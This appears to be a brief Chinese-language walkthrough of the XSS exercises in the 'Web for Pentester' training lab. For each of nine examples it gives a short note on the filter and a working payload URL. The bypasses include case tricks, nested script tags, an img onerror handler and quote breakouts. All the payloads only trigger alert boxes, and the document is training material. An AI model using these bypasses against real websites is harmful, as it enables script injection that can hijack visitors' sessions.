web for pentester xss
日期:2020-09-12
XSS
- example1
DOM 型XSS 直接注入
/xss/example1.php?name=<script>alert("xxx")</script>
- example2
DOM 型XSS 直接注入 没反应说明有过滤 首字母大写试试注入成功
/xss/example2.php?name=<Script>alert("xxx")</Script>
- example3
DOM 型XSS 直接注入 没反应说明有过滤 首字母大写发现没效果 过滤掉了script标签 所以绕过一下使得过滤一次之后一样可以注入
/xss/example3.php?name=<scr<script>ipt>alert(111)</SC</script>RIPT>
- example4
输入之前的poc发现直接返回error 应该是判断了script标签 所以只有跟换其他标签触发,例如img标签的onerror函数
/xss/example3.php?name=<img%20src=""%20%20onerror=alert("111")>
- example5
输入alert直接报错,可以使用其他的弹出框window.confirm("sometext");window.prompt("sometext","defaultText");
/xss/example5.php?name=<script>window.confirm("xss")</script>
- example6
通过f12 发现变量被复制给了a,所以可以直接闭合截断
/xss/example6.php?name=";alert(111);"
- example7
通过f12 发现变量被复制给了a,所以可以直接闭合截断 与上面一题有区别的是这次是单引号闭合
/xss/example7.php?name=hacker%27;%20alert(111);%27
- example8
通过看F12 可以看到action中的连接就是url,所以可以尝试form表单截断
/xss/example8.php/"><script>alert("xss")</script>
- example9
默认url 是显示#hacker 所以是#后面的内容是注入点 但是这个只有在ie上才有效,当然也有可能有别的解题思路
/xss/example9.php#<\script>alert(1)<\/script>